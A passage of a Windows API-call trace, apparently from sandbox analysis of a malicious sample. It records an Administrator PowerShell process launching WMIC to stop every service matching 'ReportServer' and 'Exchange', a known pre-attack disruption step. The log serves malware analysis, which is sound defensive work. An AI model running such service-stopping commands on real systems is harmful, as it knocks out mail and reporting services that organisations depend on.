cAlternateFileName="")) returned 0 [0307.995] FindClose (in: hFindFile=0x7e1c620 | out: hFindFile=0x7e1c620) returned 1 [0307.995] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0307.995] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0307.995] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x20 [0307.995] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0eafc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0eafc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xbb, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0307.995] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xba, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0307.995] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xbb, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xbb, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0307.995] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e644, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e644) returned 0x4550 [0307.996] GetConsoleWindow () returned 0x302b8 [0307.998] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e410, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0307.999] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0307.999] CoTaskMemAlloc (cb=0x804) returned 0x7e29450 [0307.999] GetConsoleTitleW (in: lpConsoleTitle=0x7e29450, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0308.000] CoTaskMemFree (pv=0x7e29450) [0308.000] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8b0e6c0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4cbe5a8 | out: lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice", lpProcessInformation=0x4cbe5a8*(hProcess=0x9f8, hThread=0x9f4, dwProcessId=0x1120, dwThreadId=0x12d4)) returned 1 [0308.011] CloseHandle (hObject=0x9f4) returned 1 [0308.011] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e680, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e680) returned 0x4550 [0308.012] GetCurrentProcess () returned 0xffffffff [0308.012] GetCurrentProcess () returned 0xffffffff [0308.012] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x9f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x8b0e904, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x8b0e904*=0x9f4) returned 1 [0308.012] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0e8fc*=0x9f4, lpdwindex=0x8b0e71c | out: lpdwindex=0x8b0e71c) returned 0x0 [0309.498] CloseHandle (hObject=0x9f4) returned 1 [0309.499] GetExitCodeProcess (in: hProcess=0x9f8, lpExitCode=0x8b0e968 | out: lpExitCode=0x8b0e968*=0x0) returned 1 [0309.499] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0309.503] CloseHandle (hObject=0x9f8) returned 1 [0309.503] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea8c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea8c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xbb, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0309.504] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xbb, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0309.504] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0309.504] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0309.504] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xba, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xba, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0309.504] SetEvent (hEvent=0xa40) returned 1 [0309.504] SetEvent (hEvent=0x9a4) returned 1 [0309.504] SetEvent (hEvent=0x9a8) returned 1 [0309.504] SetEvent (hEvent=0xa3c) returned 1 [0309.504] SetEvent (hEvent=0x9e4) returned 1 [0309.504] SetEvent (hEvent=0xa44) returned 1 [0309.504] SetEvent (hEvent=0xa48) returned 1 [0309.504] SetEvent (hEvent=0x9e8) returned 1 [0309.504] SetEvent (hEvent=0x9ec) returned 1 [0309.504] SetEvent (hEvent=0x9f0) returned 1 [0309.505] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0ef8c*=0x84c, lpdwindex=0x8b0edac | out: lpdwindex=0x8b0edac) returned 0x0 [0309.508] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0309.509] CoCreateGuid (in: pguid=0x8b0edf8 | out: pguid=0x8b0edf8*(Data1=0xfc1b3eee, Data2=0x5966, Data3=0x423c, Data4=([0]=0x8d, [1]=0xb9, [2]=0xcb, [3]=0x70, [4]=0x2a, [5]=0x52, [6]=0x7c, [7]=0xd7))) returned 0x0 [0309.509] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0edd8 | out: lpPerformanceCount=0x8b0edd8*=40454409987) returned 1 [0309.509] AmsiOpenSession () returned 0x0 [0309.510] AmsiScanString () returned 0x80070015 [0309.516] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0eda0 | out: lpPerformanceCount=0x8b0eda0*=40455028316) returned 1 [0309.516] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0eb98, nSize=0xbc | out: lpBuffer="ҳ\x05") returned 0x0 [0309.516] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0309.516] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xba, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0309.516] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0309.516] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0309.516] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0309.516] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0309.516] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0e7a0, nSize=0xbc | out: lpBuffer="?\x81氡玤ﻐ㼧洠熄䣈\x82\x02") returned 0x0 [0309.517] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e6bc, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0309.517] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0309.517] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0309.517] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0309.518] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0309.518] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0309.518] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0309.518] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0309.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0309.518] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0309.518] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0309.518] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0309.518] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0309.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0309.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0309.519] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0309.519] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0309.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0309.519] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0309.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0309.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0309.519] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0309.519] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0309.519] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0309.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0309.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0309.520] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0309.520] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0309.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0309.520] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0309.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0309.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0309.520] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0309.520] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0309.520] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0309.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0309.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0309.521] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0309.521] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0309.521] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0309.521] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb288124d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb288124d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0309.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0309.521] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0309.521] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0309.521] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0309.521] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc58640, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fc58640, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fc58640, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x7e1c8a0 [0309.521] FindNextFileW (in: hFindFile=0x7e1c8a0, lpFindFileData=0x8b0e57c | out: lpFindFileData=0x8b0e57c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0309.521] FindClose (in: hFindFile=0x7e1c8a0 | out: hFindFile=0x7e1c8a0) returned 1 [0309.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0309.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0309.522] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x20 [0309.522] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0eafc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0eafc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc3, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0309.522] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0309.522] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc3, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc3, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0309.522] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e644, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e644) returned 0x4550 [0309.523] GetConsoleWindow () returned 0x302b8 [0309.526] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e410, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0309.526] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0309.526] CoTaskMemAlloc (cb=0x804) returned 0x7e29450 [0309.526] GetConsoleTitleW (in: lpConsoleTitle=0x7e29450, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0309.527] CoTaskMemFree (pv=0x7e29450) [0309.527] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%Exchange%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8b0e6c0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, 